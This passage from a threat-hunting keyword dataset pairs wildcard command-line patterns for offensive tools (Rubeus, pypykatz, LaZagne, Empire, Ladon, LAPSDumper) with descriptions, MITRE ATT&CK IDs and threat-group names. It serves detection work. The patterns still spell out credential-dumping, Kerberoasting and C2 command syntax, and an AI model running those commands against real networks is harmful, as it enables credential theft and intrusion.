@*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -k * -c *.exe* -p Outlook.Application -o *.hta*,offensive_tool_keyword,demiguise,The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.,T1564 - T1071.001 - T1071.004 - T1059 - T1070,TA0002 - TA0011 - TA0008,N/A,N/A,Defense Evasion,https://github.com/nccgroup/demiguise,1,0,N/A,9,10,1321,262,2022-11-09T08:12:25Z,2017-07-26T08:56:15Z -* -k * -c *cmd.exe /c * -o *.hta -p ShellBrowserWindow*,offensive_tool_keyword,demiguise,The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.,T1564 - T1071.001 - T1071.004 - T1059 - T1070,TA0002 - TA0011 - TA0008,N/A,N/A,Defense Evasion,https://github.com/nccgroup/demiguise,1,0,N/A,9,10,1321,262,2022-11-09T08:12:25Z,2017-07-26T08:56:15Z -* -k --kerberoast*,offensive_tool_keyword,SilentHound,Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/layer8secure/SilentHound,1,0,N/A,N/A,5,430,44,2023-01-23T20:41:55Z,2022-07-01T13:49:24Z -* -k -request-user * -dc-ip*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* k8gege520 *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* kalilinux/kali-rolling*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* kdbof.cpp*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of pwn1sher's KillDefender,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KillDefender_BOF,1,0,N/A,10,10,50,16,2022-06-28T15:54:15Z,2022-02-11T07:03:59Z -* keepass /unprotect*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -* KeeTheft.exe*,offensive_tool_keyword,KeeThiefSyscalls,Patch GhostPack/KeeThief for it to use DInvoke and syscalls,T1003.001 - T1558.002,TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/Metro-Holografix/KeeThiefSyscalls,1,0,private github repo,10,1,N/A,N/A,N/A,N/A -* kerberoast *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* kerberoast *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* kerberoast /spn:*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,0,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -* Kerberoastables.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --kerberoasting *,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* kerberos asreproast *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* kerberos brute * -d *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* kerberos brute *.txt*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* kerberos ccache del *.ccache*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* kerberos ccache exportkirbi *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* kerberos ccache list *.ccache*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* kerberos ccache loadkirbi *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* kerberos ccache roast *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* kerberos keytab *.keytab*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* kerberos kirbi parse *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* kerberos spnroast *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* kerberos tgt *kerberos+rc4://*:*@*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* kerberos.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* --key examples/conspicuous.priv --isconspicuous*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --key PPLBlade*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,0,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -* keylogger *,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* --keyword * --check --ocr * --alexa*,offensive_tool_keyword,domainhunter,Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ,T1583.002 - T1568.002,TA0011 - TA0009,N/A,N/A,Phishing,https://github.com/threatexpress/domainhunter,1,0,N/A,N/A,10,1380,291,2022-10-26T03:15:13Z,2017-03-01T11:16:26Z -* -KillDate *,offensive_tool_keyword,empire,empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1063,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -KillDays *,offensive_tool_keyword,empire,empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1064,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* kimi.py *,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,0,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -* KittyStager*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -* klist * /service:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* knx-gateway-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* knx-gateway-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* KRB hijacking module *,offensive_tool_keyword,krbjack,A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.,T1558.002 - T1552.004 - T1048.005,TA0006 - TA0007 ,N/A,N/A,Sniffing & Spoofing,https://github.com/almandin/krbjack,1,0,N/A,10,1,73,13,2023-05-21T15:00:07Z,2023-04-16T10:44:55Z -* krb5-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --krbpass * --krbsalt * -t * --escalate-user *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --krbpass *--krbsalt*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,0,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -* KRBUACBypass*,offensive_tool_keyword,KRBUACBypass,UAC Bypass By Abusing Kerberos Tickets,T1548.002 - T1558 - T1558.003,TA0004 - TA0006,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/KRBUACBypass,1,0,N/A,8,5,402,52,2023-08-10T02:51:59Z,2023-07-27T12:08:12Z -* -l nmapRssuilt.xml -v*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,0,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -* Ladon.ps1*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* Ladon.py*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* Lalin.sh*,offensive_tool_keyword,LALIN,this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new,T1588,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/LALIN,1,0,N/A,N/A,4,350,164,2017-04-13T13:47:21Z,2016-06-10T07:53:49Z -* laps.py *--ldapserver*,offensive_tool_keyword,LAPSDumper,Dumping LAPS from Python,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/n00py/LAPSDumper,1,0,N/A,10,3,222,34,2022-12-07T18:35:28Z,2020-12-19T05:15:10Z -* laps.py *-u * -p *,offensive_tool_keyword,LAPSDumper,Dumping LAPS from Python,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/n00py/LAPSDumper,1,0,N/A,10,3,222,34,2022-12-07T18:35:28Z,2020-12-19T05:15:10Z -* laZagne.py*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,0,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -* lazypariah*,offensive_tool_keyword,LAZYPARIAH,LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly,T1059 - T1566 - T1212 - T1574,TA0002 - TA0003 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/octetsplicer/LAZYPARIAH,1,0,N/A,N/A,2,136,30,2022-06-18T08:59:45Z,2020-11-20T05:08:36Z -* ldap * --gmsa *dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* ldap * --trusted-for-delegation*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - 